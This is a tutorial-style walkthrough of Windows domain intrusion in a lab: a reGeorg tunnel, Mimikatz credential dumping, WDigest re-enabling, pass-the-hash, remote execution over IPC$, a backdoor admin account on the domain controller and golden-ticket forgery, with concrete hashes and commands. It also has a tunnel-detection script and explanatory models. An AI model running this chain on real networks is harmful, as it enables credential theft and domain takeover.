0x01 Basics
Intranet penetration means moving from a foothold on the target server into the internal network it sits on, with the ultimate goal of taking control of the domain. To get started you only need a webshell, even a low-privileged one, because higher privileges can be obtained afterwards through privilege escalation.
One concept you need before doing intranet penetration is the domain environment. An intranet may contain hundreds or thousands of machines, all of which need upgrades, patches and permission settings. An administrator cannot update and configure them one by one, hence the domain. The administrator designates one host as the domain controller, joins all other hosts to the domain, and manages them through the domain controller. Because domain administrator accounts have such high privileges, a domain administrator's account and password can log in to any host in the domain. That is why the ultimate goal of intranet penetration is to obtain domain controller privileges.
The walkthrough assumes we have already obtained an account with administrator privileges, hacker / 1234,abcd. The privilege escalation itself is not covered here; the following uses this administrator account to begin the intranet penetration practice.
0x02 Tunneling into the Intranet
During a penetration test we obtained a foothold on a server and saw with netstat -ano that port 3389 was listening, but attempts to connect to its remote desktop failed. The reason is that the server sits on the intranet and is exposed through port mapping on a public IP address: port 3389 on the public address does not necessarily map to port 3389 on this server, and often maps nowhere at all. There are two ways around this:

1. Have the target connect outwards to a host we control (a reverse tunnel). This requires a public server and, crucially, that the target can reach the Internet.
2. Set up a relay on the target itself: place a web script on the target and carry all traffic through requests to that script over the HTTP channel we already have.

Intranet hosts that cannot reach the Internet are very common in penetration tests, so method 2 is used here to tunnel into the intranet.
I. Specific process
1. First we need a tool called reGeorg to build the relay.
2. Taking a PHP site as the example, upload the tunnel.nosocket.php file to the site through the webshell obtained earlier.
3. Run the reGeorgSocksProxy.py script with Python. It opens a local SOCKS proxy on port 3344 and forwards everything sent to that port through tunnel.nosocket.php on the target:

python reGeorgSocksProxy.py -l 127.0.0.1 -p 3344 -u http://192.168.229.151/tunnel.nosocket.php

4. Use Proxifier to send the traffic of the remote desktop client mstsc.exe through the SOCKS proxy at 127.0.0.1:3344 on the local PC.
5. We now reach the intranet and can connect to the target host with remote desktop. Bear in mind that every connection through the relay is a stream of HTTP requests to the uploaded script, so the tunnel is slow and leaves a very visible trail in the web server's access log.
Other intranet tunneling tools such as frp, EarthWorm (ew) and NPS can also be used to build a tunnel into the intranet; they are not detailed here.
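The access-log trail mentioned above is also the defender's handle on this technique. The following is an added example, not code from the original post or from reGeorg: it groups POST requests by (client address, script) in a combined-format access log and flags bursts of many small POSTs to one script, which is what a polling HTTP relay looks like. The log lines are constructed, the log format is assumed to be Apache/nginx "combined", and the thresholds are assumptions to tune per site.

```python
"""Spot a reGeorg-style HTTP tunnel in a web server access log.

Added example, not code from the original post.  The relay script turns
one .php/.aspx/.jsp file into a SOCKS endpoint, and the attacker's local
proxy keeps it busy with a rapid stream of small POST requests from a
single client address.  This script groups POSTs by (client, script) and
flags bursts that no human browsing session would produce.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format (assumed); only the fields we need.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SCRIPT_RE = re.compile(r"\.(php|aspx?|jsp|ashx)$", re.I)

# Heuristic thresholds (assumptions, tune them for the site being watched).
MIN_POSTS = 20          # this many POSTs to one script from one client ...
WINDOW_SECONDS = 60     # ... inside this window ...
MAX_AVG_BYTES = 512     # ... with tiny responses (tunnel polls carry little data)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def find_tunnels(lines):
    """Return [(client_ip, script_path, total_posts)] for suspected tunnels."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST":
            posts[(rec["ip"], rec["path"].split("?", 1)[0])].append(rec)

    hits = []
    for (ip, path), recs in posts.items():
        if not SCRIPT_RE.search(path):
            continue
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):            # sliding window over time
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > WINDOW_SECONDS:
                start += 1
            n = end - start + 1
            if n >= MIN_POSTS:
                avg = sum(r["size"] for r in recs[start:end + 1]) / n
                if avg <= MAX_AVG_BYTES:
                    hits.append((ip, path, len(recs)))
                    break
    return hits


def sample_log():
    """Constructed log: 30 tunnel polls in under 20 s plus benign traffic."""
    base = datetime(2021, 6, 1, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, delta, method, path, status, size):
        ts = (base + timedelta(seconds=delta)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "-"'

    lines = [line("10.0.0.5", i * 0.6, "POST", "/tunnel.nosocket.php", 200, 0)
             for i in range(30)]
    lines += [line("10.0.0.7", 0, "GET", "/index.php", 200, 5120),
              line("10.0.0.7", 12, "GET", "/img/logo.png", 200, 20480),
              line("10.0.0.7", 40, "POST", "/login.php", 302, 0)]
    return lines


if __name__ == "__main__":
    for ip, path, n in find_tunnels(sample_log()):
        print(f"possible HTTP tunnel: {ip} -> {path} ({n} POSTs)")
```

Run it against a real log with `find_tunnels(open("access.log"))`; a hit is a (client, script) pair worth pulling the script file for inspection, since a relay script has to exist on disk for the tunnel to work.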
0x03 Collecting Intranet Information
1. Use PsExec.exe to obtain SYSTEM privileges. Domain queries run in the security context of the caller; running cmd as SYSTEM makes them use the computer account, which is itself a member of the domain, so start with:

PsExec.exe -s -i -d cmd
2. Obtain the list of all domain users. net user /domain reports that the domain is ajie.cool and that it contains the users Administrator, Guest, KRBTGT and web.
3. Obtain the domain group information with net group /domain.
4. Obtain the list of domain administrators with net group "domain admins" /domain.
5. Obtain the IP address of the domain controller. Pinging the domain name resolves to a domain controller, because the domain's DNS A records point at the DCs. (You can also check the DNS server address in ipconfig /all, which on an intranet is usually a DC, or list the DCs with nltest /dclist:ajie.cool.)
6. Install Nmap for scanning. Nmap is the usual tool for gathering intranet information during intranet penetration. 1) Upload the Nmap installer through the webshell first.
2) Connect to the target server over remote desktop and install Nmap to collect intranet information.
7. Host discovery on the intranet can also be done with NBTscan, which is much quieter. Compared with Nmap's high-volume scanning, NBTscan sends NetBIOS name queries, the same kind of traffic Windows generates when you browse the network from My Computer, so it is less likely to be noticed.
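To see exactly what NBTscan's "quiet" probe consists of, here is an added example (not code from the original post and not NBTscan's own code) that builds the single NetBIOS node-status datagram sent to UDP/137, parses the reply, and reads the <1C> group entry that marks a domain controller. The reply used for the offline check is constructed, not captured; only send_probe() talks to the network.

```python
"""NetBIOS node-status probe: the one datagram NBTscan sends to UDP/137.

Added example, not code from the original post or from NBTscan itself.
It builds the wildcard node-status query, parses the reply (name table,
MAC address) and tells from the <1C> group entry whether the responder is
a domain controller.  The reply used below is constructed, not captured;
send_probe() does the real network exchange.
"""
import socket
import struct

NB_PORT = 137
NBSTAT = 0x0021          # node status request/response record type


def encode_nb_name(name: str) -> bytes:
    """RFC 1001 first-level encoding: 16-byte name -> 32 chars 'A'..'P'."""
    padded = name.encode("ascii").ljust(16, b"\x00")   # "*" + 15 NULs is the wildcard
    enc = bytes(c for b in padded for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return b"\x20" + enc + b"\x00"


def build_nbstat_query(txid: int = 0x1234) -> bytes:
    """Header (flags 0 = unicast query, 1 question) + wildcard name + NBSTAT/IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_nb_name("*") + struct.pack(">HH", NBSTAT, 0x0001)


def parse_nbstat_response(data: bytes) -> dict:
    """Extract the name table and MAC address from a node-status response."""
    txid, flags, qdcount, ancount = struct.unpack(">HHHH", data[:8])
    if not flags & 0x8000 or ancount == 0:
        raise ValueError("not a NetBIOS response")
    off = 12
    while data[off]:                 # skip the encoded name labels
        off += data[off] + 1
    off += 1
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("not a node-status record")
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):
        raw, nflags = struct.unpack(">16sH", data[off:off + 18])
        off += 18
        names.append({"name": raw[:15].decode("ascii", "replace").rstrip(),
                      "suffix": raw[15],                 # <00>, <20>, <1C> ...
                      "group": bool(nflags & 0x8000)})
    mac = ":".join(f"{b:02x}" for b in data[off:off + 6])
    return {"txid": txid, "names": names, "mac": mac}


def is_domain_controller(parsed: dict) -> bool:
    """A host registering a <1C> group name is a domain controller for that domain."""
    return any(n["suffix"] == 0x1C and n["group"] for n in parsed["names"])


def send_probe(host: str, timeout: float = 2.0):
    """Send one query to a host and parse the reply; None on timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(), (host, NB_PORT))
        try:
            data, _ = s.recvfrom(1024)
        except socket.timeout:
            return None
    return parse_nbstat_response(data)


def sample_response() -> bytes:
    """Constructed reply from a domain controller 'AD' in domain 'AJIE'."""
    def entry(name, suffix, group=False):
        flags = 0x8400 if group else 0x0400          # group bit | active
        return name.encode().ljust(15) + bytes([suffix]) + struct.pack(">H", flags)

    rdata = (bytes([4]) + entry("AD", 0x00) + entry("AD", 0x20)
             + entry("AJIE", 0x00, True) + entry("AJIE", 0x1C, True)
             + bytes.fromhex("005056abcdef") + b"\x00" * 40)   # MAC + statistics
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
    rr = encode_nb_name("*") + struct.pack(">HHIH", NBSTAT, 0x0001, 0, len(rdata))
    return header + rr + rdata
```

One 50-byte datagram per host, answered (or not) by the NetBIOS service itself, is why this blends in with ordinary Windows browsing traffic; the <1C> entry in the reply also gives you the domain controllers for free, without a port scan.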
0x04 Reading Hashes and Passwords
Mimikatz, developed by Benjamin Delpy, reads account hashes and passwords from LSASS memory and is a staple of intranet penetration.
Here is how to read the credentials held in the server's memory with Mimikatz. 1. Open Mimikatz with administrator privileges.
2. Run privilege::debug to obtain the debug privilege.
3. Run sekurlsa::logonpasswords to dump the administrator's plaintext password and the local web user's password from memory.
4. Log in through remote desktop with the administrator account.
0x05 Pass-the-Hash
I. Basic knowledge
The previous section showed how to read credentials from memory. If the domain administrator has logged on to the server with the domain account, that account and password can be captured, which is devastating. For that reason intranet machines are often patched with KB2871997 and have WDigest authentication disabled in the registry, so no plaintext password can be dumped. The NTLM hashes can still be obtained, but a hash is one-way and cracking it takes a lot of effort. In a domain, however, a password is not checked by first reversing the hash: the client proves it knows the password by computing a challenge response keyed with the NT hash, and the authenticating machine recomputes the same response from the hash it stores and compares the two. In other words, whoever holds the hash can answer the challenge without ever knowing the password. Feeding the captured NTLM hash into the authentication process in place of a password is called pass-the-hash (PTH), and it lets us log in as the administrator while bypassing normal password entry.
II. WDigest
The WDigest setting in the registry determines whether LSASS keeps a plaintext copy of the password in memory. Check the UseLogonCredential value under the WDigest key: 1 means plaintext passwords are kept, 0 means they do not appear in memory. (On Windows 8.1 / Server 2012 R2 and later the value is absent by default, which means disabled; on Windows 7 / Server 2008 R2 the value is only honoured once KB2871997 is installed.) The setting applies to subsequent logons, so after enabling it a user has to log on again before a plaintext password can be captured. To enable or disable WDigest: (1) Enable WDigest

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2) Disable WDigest

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
III. IPC$
1. Concept
IPC$ (the inter-process communication share) is a named-pipe share that Windows exposes for communication between processes. By presenting a valid user name and password, the two parties establish an authenticated SMB session over which the remote computer can be accessed.
Conditions for using IPC$: TCP ports 139 and 445 reachable; the IPC$ share enabled on the target (the Server service running); a valid user name and password.
On an intranet the IPC$ share and the administrative shares such as C$ are enabled by default, so with administrator credentials we can reach the target's C drive through IPC$. (For local accounts other than the built-in Administrator, UAC remote restrictions block this administrative access unless LocalAccountTokenFilterPolicy is set; domain accounts are not affected.)
2. Common IPC$ commands

| Command | Meaning |
|---|---|
| net use | List the current IPC$ connections |
| net use * /del | Delete all IPC$ connections |
| net use \\192.168.1.1\ipc$ password /user:domain\account | Connect to host 192.168.1.1 in the domain |
| dir \\192.168.1.1\c$ | List the files on drive C of 192.168.1.1 |
| copy c:\12.txt \\192.168.1.1\c$\2.txt | Copy 12.txt from the local drive C to drive C of 192.168.1.1, saving it as 2.txt |
3. Command execution through IPC$
1. Schedule a task with the at command to execute a command on the remote host. This needs an IPC$ session with administrator rights already established, and at was removed from Windows 8 / Server 2012 onwards, where schtasks is used instead. The command's output is not returned, so redirect it to a file if you need to read it.

at \\192.168.1.1 11:15am cmd /c "whoami"

2. Chain at commands across multiple hops: schedule a task on the first host that establishes an IPC$ session to a second host, then another task on the first host that schedules a command on the second. The inner task must be scheduled later than the outer one so that the session already exists when it runs.

at \\192.168.100.1 11:15am cmd /c "net use \\192.168.200.1\ipc$ password /user:account"
at \\192.168.100.1 11:16am cmd /c "at \\192.168.200.1 11:17am cmd /c whoami"
IV. Pass-the-hash demonstration
1. First try to dump passwords; every result is a hash only.
2. Although no plaintext password is obtained, the NTLM hash of the domain administrator is.
3. Run cmd as SYSTEM and use the net ... /domain commands from 0x03 to identify the domain administrator and the domain controller host.
4. Try to list drive C of the domain controller through IPC$; access is denied.
5. Pass the hash with Mimikatz:

sekurlsa::pth /user:administrator /domain:"ajie.cool" /ntlm:f1de694efa543bb780da59c049541ea3

6. The command pops up a new command prompt running with the injected credentials; in that window dir \\ad.ajie.cool\c$ now succeeds.
7. From that prompt, change directory (..\) to where PsExec.exe lives and run it against the domain controller to obtain a cmd prompt on the domain controller.
8. Run ipconfig; the IP address shown is that of the domain controller.
9. Create a user on the domain controller and add it to the administrators group.
10. Try to log in to the domain controller with the new user over remote desktop; the connection fails.
11. Query the registry from the domain controller prompt. fDenyTSConnections returns 0x1 when remote desktop is disabled (0x0 when enabled):

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

12. Use the domain controller's command prompt to modify the registry, enable remote desktop and make sure the listener is on the default port 3389 (0xd3d):

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

If Windows Firewall is active, the Remote Desktop rule group must also be enabled (netsh advfirewall), otherwise port 3389 stays blocked.
13. Log in to the domain controller over remote desktop with the newly created user.
0x06 Golden Ticket
I. Basic knowledge
In a domain environment a domain administrator's account and password can log in to any host in the domain. How does a host verify those credentials? Either the host asks the domain controller directly, or a trusted third party verifies the account and password. In a domain that third party is the KDC, the Key Distribution Center, which runs on the domain controller. (The following touches on the Kerberos protocol; I did not study it in much depth, so this is only a brief description.)
II. KDC (Key Distribution Center)
The Key Distribution Center (KDC) holds the names and long-term keys (the "master keys", derived from the password hashes) of every account in the domain.
It provides two services: the Authentication Service (AS) and the Ticket Granting Service (TGS).
1. AS
The Authentication Service handles the initial logon. The user states who they are and proves knowledge of the password by encrypting a timestamp with their key. The AS decrypts it with the key it holds for that user and returns a TGT (ticket granting ticket), encrypted with the krbtgt account's key so that only the KDC can read it, together with a session key encrypted with the user's key.
2. TGS
Once a TGT has been obtained, the Ticket Granting Service (TGS) can be accessed by presenting it.
The TGS verifies the TGT by decrypting it with the krbtgt key and returns a service ticket encrypted with the target service account's key. The user presents that ticket to the server; the server decrypts it with its own key and, if it is valid, provides the service. The server does not need to contact the KDC for this.
3. Tickets
In intranet penetration, forged tickets are known as silver tickets and golden tickets. A silver ticket is a forged service ticket made with the hash of one service account and only works against that service; a golden ticket is a forged TGT made with the krbtgt hash and can be exchanged at the TGS for a ticket to any service. Tickets are the credentials of the Kerberos authentication protocol: once the AS and TGS have issued them, you can log in to the target host at will.
When querying domain users, KRBTGT is always listed, as shown in Figure 5-37. The KRBTGT account is the service account of the KDC, and its key encrypts every TGT. If we hold the krbtgt hash we can mint a TGT ourselves for any account: the TGS accepts it because it verifies under the krbtgt key, exactly as if the KDC had issued it, and grants whatever privileges the forged ticket claims. Administrators routinely change domain account passwords, but few ever reset the krbtgt password, so a golden ticket stays valid until krbtgt is reset (twice, because the KDC still honours tickets under the previous krbtgt key). In the final stage of intranet penetration we use a golden ticket to maintain access, so here is how to obtain one from the KRBTGT account.
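The trust decision described above, and exercised in the demonstration that follows, can be modelled in a few dozen lines. This is an added example, not code from the original post or from Mimikatz: the real KDC encrypts the TGT with the krbtgt key, whereas this toy seals a JSON body with HMAC-SHA256 under that key, which is enough to show that the TGS accepts any ticket verifying under the krbtgt key without looking the user up again, and that only a krbtgt key change invalidates a forged ticket. Keys, accounts and RIDs are constructed; the domain SID is the one from the post.

```python
"""Toy KDC showing why the krbtgt hash yields a 'golden ticket'.

Added example, not code from the original post.  A real KDC encrypts the
TGT with the krbtgt account's key (derived from its password hash); here
the TGT is a JSON body sealed with HMAC-SHA256 under that key, which is
enough to reproduce the trust decision that matters: the ticket-granting
service accepts any TGT that verifies under the krbtgt key and does not
look the named user up again, so whoever holds the krbtgt hash can mint a
TGT for any name, SID and group list.  Keys, accounts and RIDs below are
constructed; the domain SID is the one from the post.
"""
import hashlib
import hmac
import json
import time

DOMAIN_SID = "S-1-5-21-3296092892-1320626564-2720975204"
DOMAIN_ADMINS_RID = 512
DOMAIN_USERS_RID = 513
TGT_LIFETIME = 10 * 3600


def _seal(key: bytes, body: dict) -> str:
    """Stand-in for encrypting a ticket: body || HMAC(key, body)."""
    raw = json.dumps(body, sort_keys=True).encode()
    return raw.hex() + "." + hmac.new(key, raw, hashlib.sha256).hexdigest()


def _unseal(key: bytes, ticket: str) -> dict:
    raw_hex, tag = ticket.split(".", 1)
    raw = bytes.fromhex(raw_hex)
    if not hmac.compare_digest(hmac.new(key, raw, hashlib.sha256).hexdigest(), tag):
        raise PermissionError("ticket does not verify under this key")
    return json.loads(raw)


def preauth(user_key: bytes, now: float) -> bytes:
    """Client side of AS pre-authentication: prove the user's key over a timestamp."""
    return hmac.new(user_key, str(int(now)).encode(), hashlib.sha256).digest()


class KDC:
    def __init__(self, krbtgt_key: bytes, accounts: dict):
        self.krbtgt_key = krbtgt_key
        self.accounts = accounts    # name -> {"key": bytes, "rid": int, "groups": [rids]}

    def as_exchange(self, user: str, now: float, proof: bytes) -> str:
        """AS: check pre-auth against the account database, then issue a TGT."""
        acct = self.accounts.get(user)
        if acct is None or not hmac.compare_digest(preauth(acct["key"], now), proof):
            raise PermissionError("pre-authentication failed")
        body = {"user": user, "sid": f"{DOMAIN_SID}-{acct['rid']}",
                "groups": acct["groups"], "exp": now + TGT_LIFETIME}
        return _seal(self.krbtgt_key, body)

    def tgs_exchange(self, tgt: str, service: str, now: float) -> dict:
        """TGS: the only check on the TGT is that it verifies under the krbtgt key."""
        body = _unseal(self.krbtgt_key, tgt)
        if body["exp"] < now:
            raise PermissionError("TGT expired")
        return {"service": service, "user": body["user"],
                "sid": body["sid"], "groups": body["groups"]}


def forge_golden_ticket(krbtgt_key: bytes, now: float, user="administrator",
                        rid=500, groups=(DOMAIN_ADMINS_RID,)) -> str:
    """Attacker side: with the dumped krbtgt hash there is no AS exchange at all."""
    body = {"user": user, "sid": f"{DOMAIN_SID}-{rid}",
            "groups": list(groups), "exp": now + TGT_LIFETIME}
    return _seal(krbtgt_key, body)


def demo():
    """(groups of a real user, groups the forged ticket gets, forged ticket rejected after reset)."""
    now = time.time()
    kdc = KDC(b"constructed-krbtgt-key",
              {"web": {"key": b"web-key", "rid": 1105, "groups": [DOMAIN_USERS_RID]}})
    tgt = kdc.as_exchange("web", now, preauth(b"web-key", now))
    real = kdc.tgs_exchange(tgt, "cifs/ad.ajie.cool", now)
    golden = forge_golden_ticket(b"constructed-krbtgt-key", now)   # the /krbtgt: value
    forged = kdc.tgs_exchange(golden, "cifs/ad.ajie.cool", now)
    kdc.krbtgt_key = b"new-krbtgt-key"                             # krbtgt password reset
    try:
        kdc.tgs_exchange(golden, "cifs/ad.ajie.cool", now)
        revoked = False
    except PermissionError:
        revoked = True
    return real["groups"], forged["groups"], revoked
```

Note what the model leaves out on purpose: "administrator" is not even present in the account database, yet the forged ticket is honoured, and resetting the administrator's password would change nothing. The same holds in a real domain, which is why a krbtgt reset is the only remediation.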
III. Demonstration
1. Upload mimikatz.exe and PsExec.exe to the domain controller over remote desktop.
2. Use PsExec to get a SYSTEM prompt, run mimikatz, and enter lsadump::dcsync /user:krbtgt to obtain the hash of KRBTGT.
3. The data needed to make the golden ticket:

Object Security ID : S-1-5-21-3296092892-1320626564-2720975204-502
Hash NTLM: 31edc56a2302a25a2e9bee5f04abd659

The -502 at the end of the Object Security ID is the RID of the krbtgt account; the domain SID is everything before it, so drop the -502 when making the ticket.
4. Exit the remote desktop and make the golden ticket with Mimikatz on the attacker machine. After the command runs, the file administrator.kirbi is written:

kerberos::golden /admin:administrator /domain:ajie.cool /sid:S-1-5-21-3296092892-1320626564-2720975204 /krbtgt:31edc56a2302a25a2e9bee5f04abd659 /ticket:administrator.kirbi

5. With the ticket made, try to reach drive C of the domain controller; it is not yet accessible.
6. Purge the ticket cache with kerberos::purge; kerberos::list then shows no tickets, confirming the cache is empty.
7. Load the generated ticket with kerberos::ptt administrator.kirbi.
8. Drive C of the domain controller is now accessible without a password (address it by host name, dir \\ad.ajie.cool\c$, since Kerberos tickets are issued for names rather than IP addresses). Escalating further is the same as in the pass-the-hash demonstration and is not repeated here.
0x07 Summary
The above is the simple process I learned: obtain a shell from the Internet and, with or without privilege escalation, go straight into the intranet. Some concepts are not explained clearly, so I hope readers will point out corrections. This is only my personal learning process and the material may be quite basic; please bear with me.